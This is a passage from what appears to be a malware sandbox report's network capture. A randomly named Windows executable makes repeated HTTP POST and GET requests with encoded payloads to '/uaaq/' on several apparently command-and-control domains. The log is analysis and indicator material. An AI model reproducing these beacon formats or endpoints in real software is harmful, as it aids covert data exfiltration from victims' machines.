                                                                                    Dec 4, 2023 12:09:03.346555948 CET | 422 | OUT | GET /uaaq/?XFs82=6R5Xx6907&9pG0L=ZvgtLzuC5J0fwHYuRehKE7pqe+TegS3vAv4ZEylVZ8S9BUo4tJK/O+Yy7erX60uFZvklPnpu2szjI2ePXJ09nWZe2eIrY7ioDA== HTTP/1.1
                                                                                    Host: www.rocsys.net
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:09:03.524601936 CET | 1340 | IN | HTTP/1.1 200 OK
                                                                                    Date: Fri, 28 Apr 2023 12:26:41 GMT
                                                                                    Server: Apache
                                                                                    Last-Modified: Thu, 04 Nov 2021 09:16:05 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Content-Type: text/html
                                                                                    Cache-Control: max-age=31536000
                                                                                    X-Varnish: 1066635694 3
                                                                                    Age: 19003342
                                                                                    Via: 1.1 varnish (Varnish/6.1)
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 64668
                                                                                    Connection: close
                                                                                    Data Ascii: <!DOCTYPE html><html> <head lang="en"> <meta charset="ascii"> <title>TransIP - Reserved domain</title> <meta name="description" content="TransIP - Reserved domain"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <link rel="shortcut icon" href="//reserved.transip.nl/assets/img/favicon.ico" type="image/x-icon" /> <link href='https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,900' rel='stylesheet' type='text/css'> <link rel="stylesheet" href="//reserved.transip.nl/assets/css/combined-min.css"> <title>Bezet!</title> </head> <body> <div class="container"> <div role="navigation" class="reserved-nav-container"> <div class="col-xs-6 reserved-nav-left reserved-nav-brand">


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    66 | 192.168.11.30 | 49826 | 146.148.34.125 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:09:09.008347988 CET | 689 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.tubidy.tech
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.tubidy.tech
                                                                                    Referer: http://www.tubidy.tech/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:09:09.129849911 CET | 232 | IN | HTTP/1.1 302 Found
                                                                                    Date: Mon, 04 Dec 2023 11:09:09 GMT
                                                                                    Server: Apache
                                                                                    Location: http://ww11.www.tubidy.tech/
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    67 | 192.168.11.30 | 49827 | 146.148.34.125 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:09:11.648499966 CET | 709 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.tubidy.tech
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.tubidy.tech
                                                                                    Referer: http://www.tubidy.tech/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:09:11.770648956 CET | 232 | IN | HTTP/1.1 302 Found
                                                                                    Date: Mon, 04 Dec 2023 11:09:11 GMT
                                                                                    Server: Apache
                                                                                    Location: http://ww11.www.tubidy.tech/
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    68 | 192.168.11.30 | 49828 | 146.148.34.125 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:09:14.291930914 CET | 1626 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.tubidy.tech
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.tubidy.tech
                                                                                    Referer: http://www.tubidy.tech/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:09:14.415582895 CET | 232 | IN | HTTP/1.1 302 Found
                                                                                    Date: Mon, 04 Dec 2023 11:09:14 GMT
                                                                                    Server: Apache
                                                                                    Location: http://ww11.www.tubidy.tech/
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    69 | 192.168.11.30 | 49829 | 146.148.34.125 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:09:16.945385933 CET | 423 | OUT | GET /uaaq/?9pG0L=+fLke0FkZ8ddpf91rSuK7zl5QINwJbdABoU0VkbbyogRs1jBfiuiWgTdT60Kd54wcvqO12MKWygzxtqc9m8Iy6fCV4+OuKKc/Q==&XFs82=6R5Xx6907 HTTP/1.1
                                                                                    Host: www.tubidy.tech
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:09:17.068785906 CET | 232 | IN | HTTP/1.1 302 Found
                                                                                    Date: Mon, 04 Dec 2023 11:09:17 GMT
                                                                                    Server: Apache
                                                                                    Location: http://ww11.www.tubidy.tech/
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    70 | 192.168.11.30 | 49830 | 91.195.240.19 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:09:22.254057884 CET | 698 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.infinite-7.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.infinite-7.com
                                                                                    Referer: http://www.infinite-7.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:09:22.436762094 CET | 755 | IN | HTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:09:22 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    71 | 192.168.11.30 | 49831 | 91.195.240.19 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:09:24.957211971 CET | 718 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.infinite-7.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.infinite-7.com
                                                                                    Referer: http://www.infinite-7.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=rOoNk3lcyTEBtAIya0ThQATwW2m35MGswfq1tvggrlY+k8ob7u1oQux5dVMN9h6NFIjw/YSo6+G3rDo1ZHZjGebOrd/a0Z8YKCFz2KvB641m6ORorodos7akf4o5r8VGeti6xg0ubAL5Xfj7niKiRND6XOQwcnpQuLzshC40YF3shNfvuWeURkPDnWutTAVLVd5AaWw=
                                                                                    Dec 4, 2023 12:09:25.140680075 CET | 755 | IN | HTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:09:25 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    72 | 192.168.11.30 | 49832 | 91.195.240.19 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:09:27.659082890 CET | 1635 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.infinite-7.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.infinite-7.com
                                                                                    Referer: http://www.infinite-7.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:09:27.841583967 CET | 755 | IN | HTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:09:27 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    73 | 192.168.11.30 | 49833 | 91.195.240.19 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:09:30.362260103 CET | 426 | OUT | GET /uaaq/?XFs82=6R5Xx6907&9pG0L=mMAtnDth0zIbmmwbJQD8SlCQVGGtkMLB+9yssOEsh1d4l9lYjNEmW7ArbhIk2T6dCq7f547m+Me71T0/Rw5JLcbntfWt6c4bbw== HTTP/1.1
                                                                                    Host: www.infinite-7.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:09:30.545711040 CET | 161 | IN | HTTP/1.1 436
                                                                                    date: Mon, 04 Dec 2023 11:09:30 GMT
                                                                                    content-length: 0
                                                                                    server: NginX
                                                                                    connection: close


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    74 | 192.168.11.30 | 49834 | 133.130.64.24 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:09:35.838227987 CET | 707 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.resolution-pj.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.resolution-pj.com
                                                                                    Referer: http://www.resolution-pj.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=25PvDmxTPAZwJNPS0CCh26jU7Or/RMQixuSxAcq5sFqj8AcOtHpKF5Wk9eraDW3tGCGx8KEFWBgHh73uD2TApbPpN9wDb8xWnJotiSHyAi6ymSZqeXHr8zxHc7QJ6BCMcC+dmJSGVcjeqqniBnvbfM9m6CE4TgH5azI/nTEB99AEW5pXsg==
                                                                                    Dec 4, 2023 12:09:36.129631042 CET | 267 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:09:35 GMT
                                                                                    Server: Apache
                                                                                    Last-Modified: Tue, 13 Sep 2022 05:08:13 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 1260
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Dec 4, 2023 12:09:36.129713058 CET | 1314 | IN
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    75 | 192.168.11.30 | 49835 | 133.130.64.24 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:09:38.651577950 CET | 727 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.resolution-pj.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.resolution-pj.com
                                                                                    Referer: http://www.resolution-pj.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=25PvDmxTPAZwb5zS1leh3ajT+Or/bsQmxuWxAYaXs3+j8hsO/zdKC5Wk1+rDM23mGCbO8KIFWBEHh6nuAHTDzrPrBdwBGsxWnJotiSiVAiyymBBqc2Hs1TxEb7QJrxCIcC/4mIPRVZ/eqrXiC2vcQM9snyFLUj+BViln3yYPuvYRXsFEraur+jKMIVYNigMMqdkV+6Q=
                                                                                    Dec 4, 2023 12:09:38.940289974 CET | 267 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:09:38 GMT
                                                                                    Server: Apache
                                                                                    Last-Modified: Tue, 13 Sep 2022 05:08:13 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 1260
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Dec 4, 2023 12:09:38.940367937 CET | 1314 | IN
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    76 | 192.168.11.30 | 49836 | 133.130.64.24 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:09:41.461824894 CET | 1644 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.resolution-pj.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.resolution-pj.com
                                                                                    Referer: http://www.resolution-pj.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:09:41.758013010 CET | 267 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:09:41 GMT
                                                                                    Server: Apache
                                                                                    Last-Modified: Tue, 13 Sep 2022 05:08:13 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 1260
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Dec 4, 2023 12:09:41.758191109 CET | 1314 | IN | Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    77 | 192.168.11.30 | 49837 | 133.130.64.24 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:09:45.413652897 CET | 429 | OUT | GET /uaaq/?9pG0L=77nPASVBGS1VUo/R/j6d44mDwP+QIahx3JuWX6aukgDTtShzh3giMrfi3qntC2nVHjeoyaY8HDsr1L/VBT/etq3vOO5xT7Atwg==&XFs82=6R5Xx6907 HTTP/1.1
                                                                                    Host: www.resolution-pj.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:09:45.701809883 CET | 267 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:09:45 GMT
                                                                                    Server: Apache
                                                                                    Last-Modified: Tue, 13 Sep 2022 05:08:13 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 1260
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Dec 4, 2023 12:09:46.038635969 CET | 1314 | IN | Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    78 | 192.168.11.30 | 49838 | 91.195.240.117 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:09:51.232829094 CET | 695 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.atlasmisc.org
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.atlasmisc.org
                                                                                    Referer: http://www.atlasmisc.org/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=It8BAak1/wRQhDlqmXthvYozKNfKFsSEuNNdrnsSAtvYJp3Mc7mSGVwpGazGYHF+3XBZqjbDmxEakPjXtVjPNVDcU/XVs0R8CSxO9wpMN10NTVugG8YaM/QjSgqe8L/AB1Kvf3dZkSTlCYxUeHw95+0qITTfHWFUZmuNPwNahIHrBUKjFg==
                                                                                    Dec 4, 2023 12:09:51.415908098 CET | 755 | IN | HTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:09:51 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    79 | 192.168.11.30 | 49839 | 91.195.240.117 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:09:53.935081959 CET | 715 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.atlasmisc.org
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.atlasmisc.org
                                                                                    Referer: http://www.atlasmisc.org/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=It8BAak1/wRQhj1qn0Fhq4o0WdfKPMSIuNBdrlA4Af7YJIHMd6mSHVwpN6zHSnFP3Xd/qhfDmwgakKnXtkjMMFDaffXXjUR8CSxO9w9mN1sNTm2gHdYZBfQiCQqet7/EB1LCf2B3kUXlCdNUfWwyqe0sMTS+Izc5UnPVGD5V/ZS1ABmwCc6LjjFP0mik/RdYqbxu+48=
                                                                                    Dec 4, 2023 12:09:54.118352890 CET | 755 | IN | HTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:09:54 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    80 | 192.168.11.30 | 49840 | 91.195.240.117 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:09:56.637703896 CET | 1632 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.atlasmisc.org
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.atlasmisc.org
                                                                                    Referer: http://www.atlasmisc.org/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:09:56.821301937 CET | 755 | IN | HTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:09:56 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    81 | 192.168.11.30 | 49841 | 91.195.240.117 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:09:59.340418100 CET | 425 | OUT | GET /uaaq/?XFs82=6R5Xx6907&9pG0L=FvUhDsBmpCJoj3lGkDh7rJRDQZ/xWYuOs9BV8EopI6SMYb/NSZXNOV1HCqXbeEBh5mla6CDOuwUwzd7BjgPBM1LiYO3UkBsWTw== HTTP/1.1
                                                                                    Host: www.atlasmisc.org
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
